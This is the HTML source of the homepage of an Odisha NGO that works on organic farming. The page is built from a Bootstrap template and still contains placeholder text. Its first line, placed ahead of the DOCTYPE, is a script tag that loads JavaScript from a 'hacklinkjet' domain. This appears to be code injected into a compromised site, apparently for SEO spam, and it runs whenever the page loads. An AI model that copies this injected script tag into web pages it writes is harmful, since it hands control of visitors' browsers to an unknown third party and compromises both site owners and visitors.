<script src="https://panel.hacklinkjet.com/zirve.js"></script><!DOCTYPE html>
<html lang="en">
<head>
  <!-- Theme Made By www.w3schools.com -->
  <title>Global Project of Hope, Help and Healing</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  
  <!-- Google Fonts -->
      <link href="https://fonts.googleapis.com/css2?								family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Ubuntu:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap" rel="stylesheet">
  
  <!-- ICON -->
  <link rel="icon" type="image/x-icon" href="image/GPH3_png.png">
  
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">
  <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
  <link rel="stylesheet" href="style.css">

  
  
</head>
<body id="myPage" data-spy="scroll" data-target=".navbar" data-offset="60">

<nav class="navbar navbar-default navbar-fixed-top">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>                        
      </button>
      <a class="navbar-brand" href="index.html"><img src="image/GPH3_logo_2.png"></a>
    </div>
    <div class="collapse navbar-collapse" id="myNavbar">
      <ul class="nav navbar-nav navbar-right">
         <li><a href="index.html">Home</a></li>
        <li><a href="about.html">About Us</a></li>
         <li><a href="activities.html">Activities</a></li>
        <li><a href="#services">Projects</a></li>
        <li><a href="gallery.html">Gallery</a></li>
        <li><a href="contact.html">Contact Us</a></li>
       
      </ul>
    </div>
  </div>
</nav>

<div class="jumbotron text-center bann" style=" margin-bottom: 0px;">
  <h1 id="mar"> <b> Global Project of Hope, Help &amp; Healing</b></h1> 
  <p style="font-family: 'Ubuntu';">We specialize in development of sustainable organic farming system</p> 
 
</div>


<!-- ****************banner start**************** -->
    <div id="myCarousel" class="carousel slide" data-ride="carousel">
      <!-- Indicators -->
      <ol class="carousel-indicators">
        <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
        <li data-target="#myCarousel" data-slide-to="1"></li>
        <li data-target="#myCarousel" data-slide-to="2"></li>
        
      </ol>
  
      <!-- Wrapper for slides -->
      <div class="carousel-inner">
  
        <div class="item active">
          <img src="image/ngo_2.jpg" alt="Los Angeles" style="width:100%;">
          <div class="carousel-caption">
            <h3></h3>
            <p></p>
          </div>
        </div>
  
        <div class="item">
          <img src="image/ngo_3.jpg" alt="Chicago" style="width:100%;">
          <div class="carousel-caption">
            <h3></h3>
            <p></p>
          </div>
        </div>
      
        <div class="item">
          <img src="image/ngo_child.jpg" alt="New York" style="width:100%;">
          <div class="carousel-caption">
            <h3></h3>
            <p></p>
          </div>
        </div>
    
      </div>
  
      <!-- Left and right controls -->
      <a class="left carousel-control" href="#myCarousel" data-slide="prev">
        <span class="glyphicon glyphicon-chevron-left"></span>
        <span class="sr-only">Previous</span>
      </a>
      <a class="right carousel-control" href="#myCarousel" data-slide="next">
        <span class="glyphicon glyphicon-chevron-right"></span>
        <span class="sr-only">Next</span>
      </a>
    </div>

<!-- *****************banner end************** -->


<!-- Container (About Section) -->
<div id="about" class="container-fluid">
  <div class="row">
    <div class="col-sm-8">
      <h2>About GPH3</h2><br>
     <!-- <h4>Global Project of Hope, Health &amp; Healing (GPH3) is working with small, marginal and women farmers on the following
        activities:</h4> -->
      <div>
    <p class="mb-3">
       Global Project of Hope, Health &amp; Healing (GPH3) is a non-governmental organization
(NGO) working all over Odisha. It headquarters is at Gajapati and branch office is at
Bhubaneswar, Odisha. Established in the year 2013, GPH3 works in the area of
Environment and natural resource management, Food and Agriculture, Health &amp;
Nutrition, Rural Development &amp; Poverty Alleviation. The NGO works towards the
promotion of sustainable development.        
    </p>
	<p class="mt-4">
       India being the developing Nation, the majority of the population belongs to the rural
area, and their lives revolve around the agricultural sector for employment and means
of livelihood. Farming and agriculture have always been one of the essential economic
activities in India. Near about two-thirds of the population engaged in agriculture and
agriculture-related activities, it is crucial to understand Indiaâ€™s plight and why they are
struggling. For a few decades, the working environment and the agricultural scenario
are stagnant, and it is no more a profit-making sector like before. It was somehow the
need of the hour to dig into the real issues relating to agriculture and rectify the same
through our NGOâ€™s being the Agriculture NGO in Odisha.
 <a href="about.html"> <button class="btn btn-default btn-lg" style="float:right;">Read More</button></a>
    </p>
      </div>
      
    </div>
    <div class="col-sm-4">
      <!-- <span class="glyphicon glyphicon-signal logo"></span> -->
      <img src="image/ngo_8.jpg" alt="New York" width="400" height="300" style="margin-top: 20px;">
    </div>
  </div>
</div>

<div class="container-fluid bg-grey">
  <div class="row">
    <div class="col-sm-4">
      <span class="glyphicon glyphicon-globe logo slideanim" id="colo"></span>
    </div>
    <div class="col-sm-8">
      <h2>Our Values</h2><br>
       <p style="margin-top:-20px;"><h4> <strong>OBJECTIVES:</strong></h4>To mobilise large farming community for adopting available appropriate agri-
        technologies and techniques that help them to sustain productivity and produce
        quality of various agricultural and horticulture crops which in turn will increase their
        livelihood.</p>
      <h4> <h4> <strong>MISSION:</strong></h4>Create informed pool of farm families with modern Organic Agriculture techniques
        and technology products for infusing efficiency in farming sector by empowering
        farming communities, SHGs, FPOs, NGOs, CBOs, agri-entrepreneurs for use of natural
        farm inputs, better crop production, climate resilient agriculture, handholding support
        for value-addition in post-harvest management and food-system.</h4><br>
     
    </div>
  </div>
</div>

<!-- Container (Services Section) -->
<div id="services" class="container-fluid text-center">
  <h2>SERVICES</h2>
  <h4>What we offer</h4>
  <br>
  <div class="row slideanim">
    <div class="col-sm-4">
        <span class="glyphicon glyphicon-leaf logo-small colo"></span>
      <h4>Organic Farming</h4>
      <p>Lorem ipsum dolor sit amet..</p>
    </div>
    <div class="col-sm-4">
        <span class="glyphicon glyphicon-leaf logo-small colo"></span>
      <h4>Community Farming</h4>
      <p>Lorem ipsum dolor sit amet..</p>
    </div>
    <div class="col-sm-4">
      <span class="glyphicon glyphicon-leaf logo-small colo"></span>
      <h4>Market Linkages</h4>
      <p>Lorem ipsum dolor sit amet..</p>
    </div>
  </div>
  <br><br>
  <div class="row slideanim">
    
    <div class="col-sm-4">
        <span class="glyphicon glyphicon-leaf logo-small colo"></span>
      <h4>Livelihood Support</h4>
      <p>Lorem ipsum dolor sit amet..</p>
    </div>
    <div class="col-sm-4">
        <span class="glyphicon glyphicon-leaf logo-small colo"></span>
      <h4 style="color:#303030;">Capacity Building Training</h4>
      <p>Lorem ipsum dolor sit amet..</p>
    </div>
  </div>
</div>

<!-- Container (Portfolio Section) -->
<!--<div id="portfolio" class="container-fluid text-center bg-grey">
  <h2>Portfolio</h2><br>
  <h4>What we have created</h4>
  <div class="row text-center slideanim">
    <div class="col-sm-4">
      <div class="thumbnail">
        <img src="image/ngo_6.jpg" alt="Paris" width="400" height="300">
        <p><strong>Lorem</strong></p>
        <p>Lorem ipsum</p>
      </div>
    </div>
    <div class="col-sm-4">
      <div class="thumbnail">
        <img src="image/ngo_7.jpg" alt="New York" width="400" height="300">
        <p><strong>Lorem</strong></p>
        <p>Lorem Ipsum</p>
      </div>
    </div>
    <div class="col-sm-4">
      <div class="thumbnail">
        <img src="image/ngo_6.jpg" alt="San Francisco" width="400" height="300">
        <p><strong>Lorem</strong></p>
        <p>Lorem Ipsum</p>
      </div>
    </div>
  </div><br>
  
  <h2>What our customers say</h2>
  <div id="myCarousel" class="carousel slide text-center" data-ride="carousel">
    <!-- Indicators -->
  <!--  <ol class="carousel-indicators">
      <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
      <li data-target="#myCarousel" data-slide-to="1"></li>
      <li data-target="#myCarousel" data-slide-to="2"></li>
    </ol>

    <!-- Wrapper for slides -->
    <!--<div class="carousel-inner" role="listbox">
      <div class="item active">
        <h4>"This company is the best. I am so happy with the result!"<br><span>Michael Roe, Vice President, Comment Box</span></h4>
      </div>
      <div class="item">
        <h4>"One word... WOW!!"<br><span>John Doe, Salesman, Rep Inc</span></h4>
      </div>
      <div class="item">
        <h4>"Could I... BE any more happy with this company?"<br><span>Chandler Bing, Actor, FriendsAlot</span></h4>
      </div>
    </div>

    <!-- Left and right controls -->
   <!-- <a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
      <span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
      <span class="sr-only">Previous</span>
    </a>
    <a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
      <span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
      <span class="sr-only">Next</span>
    </a>
  </div>
</div> -->

<!-- Container (Pricing Section) -->
<!-- <div id="pricing" class="container-fluid">
  <div class="text-center">
    <h2>Pricing</h2>
    <h4>Choose a payment plan that works for you</h4>
  </div>
  <div class="row slideanim">
    <div class="col-sm-4 col-xs-12">
      <div class="panel panel-default text-center">
        <div class="panel-heading">
          <h1>Basic</h1>
        </div>
        <div class="panel-body">
          <p><strong>20</strong> Lorem</p>
          <p><strong>15</strong> Ipsum</p>
          <p><strong>5</strong> Dolor</p>
          <p><strong>2</strong> Sit</p>
          <p><strong>Endless</strong> Amet</p>
        </div>
        <div class="panel-footer">
          <h3>$19</h3>
          <h4>per month</h4>
          <button class="btn btn-lg">Sign Up</button>
        </div>
      </div>      
    </div>     
    <div class="col-sm-4 col-xs-12">
      <div class="panel panel-default text-center">
        <div class="panel-heading">
          <h1>Pro</h1>
        </div>
        <div class="panel-body">
          <p><strong>50</strong> Lorem</p>
          <p><strong>25</strong> Ipsum</p>
          <p><strong>10</strong> Dolor</p>
          <p><strong>5</strong> Sit</p>
          <p><strong>Endless</strong> Amet</p>
        </div>
        <div class="panel-footer">
          <h3>$29</h3>
          <h4>per month</h4>
          <button class="btn btn-lg">Sign Up</button>
        </div>
      </div>      
    </div>       
    <div class="col-sm-4 col-xs-12">
      <div class="panel panel-default text-center">
        <div class="panel-heading">
          <h1>Premium</h1>
        </div>
        <div class="panel-body">
          <p><strong>100</strong> Lorem</p>
          <p><strong>50</strong> Ipsum</p>
          <p><strong>25</strong> Dolor</p>
          <p><strong>10</strong> Sit</p>
          <p><strong>Endless</strong> Amet</p>
        </div>
        <div class="panel-footer">
          <h3>$49</h3>
          <h4>per month</h4>
          <button class="btn btn-lg">Sign Up</button>
        </div>
      </div>      
    </div>    
  </div>
</div> -->

<!-- Container (Contact Section) -->
<div id="contact" class="container-fluid bg-grey">
  <h2 class="text-center">CONTACT</h2>
  <div class="row mb-0 pb-0">
    <div class="col-sm-5">
      <p>Contact us and we'll get back to you within 24 hours.</p>
      <p>REG. OFFICE:</p>
      <p><span class="glyphicon glyphicon-map-marker"></span>At/Po- Nuagada, PS- Serango, Block- Nuagada, DIST. - Gajapati, Odisha - 761214</p>
      <p><span class="glyphicon glyphicon-phone"></span> + 91 96920 60132</p>
      <p><span class="glyphicon glyphicon-envelope"></span> admin@gph3.com</p>
      
        <form class="mt-5">
    <div class="input-group mt-5">
      <input type="email" class="form-control" size="50" placeholder="Email Address" required>
      <div class="input-group-btn">
        <button type="button" class="btn btn-danger">Subscribe</button>
      </div>
    </div>
  </form>
    </div>
    <div class="col-sm-7 slideanim">
      <div class="row">
        <div class="col-sm-6 form-group">
          <input class="form-control" id="name" name="name" placeholder="Name" type="text" required>
        </div>
        <div class="col-sm-6 form-group">
          <input class="form-control" id="email" name="email" placeholder="Email" type="email" required>
        </div>
      </div>
      <textarea class="form-control" id="comments" name="comments" placeholder="Comment" rows="5"></textarea><br>
      <div class="row">
        <div class="col-sm-12 form-group">
          <button class="btn btn-default pull-right subscribebtn" type="submit">Send</button>
        </div>
      </div>
    </div>
  </div>
</div>

            <!-- Image of location/map 
            <img src="" class="w3-image w3-greyscale-min" style="width:100%">
            -->


<footer class="container-fluid text-center footer">
  <a href="#myPage" title="To Top">
    <span class="glyphicon glyphicon-chevron-up"></span>
  </a>
  <p>&#169; 2021-2022 GPH3.in.All rights eserved| <a href="https://www.xprosolutions.co.in" title="Visit w3schools">XPRO Solutions</a></p>
</footer>

<script>
$(document).ready(function(){
  // Add smooth scrolling to all links in navbar + footer link
  $(".navbar a, footer a[href='#myPage']").on('click', function(event) {
    // Make sure this.hash has a value before overriding default behavior
    if (this.hash !== "") {
      // Prevent default anchor click behavior
      event.preventDefault();

      // Store hash
      var hash = this.hash;

      // Using jQuery's animate() method to add smooth page scroll
      // The optional number (900) specifies the number of milliseconds it takes to scroll to the specified area
      $('html, body').animate({
        scrollTop: $(hash).offset().top
      }, 900, function(){
   
        // Add hash (#) to URL when done scrolling (default click behavior)
        window.location.hash = hash;
      });
    } // End if
  });
  
  $(window).scroll(function() {
    $(".slideanim").each(function(){
      var pos = $(this).offset().top;

      var winTop = $(window).scrollTop();
        if (pos < winTop + 600) {
          $(this).addClass("slide");
        }
    });
  });
})
</script>

</body>
</html>
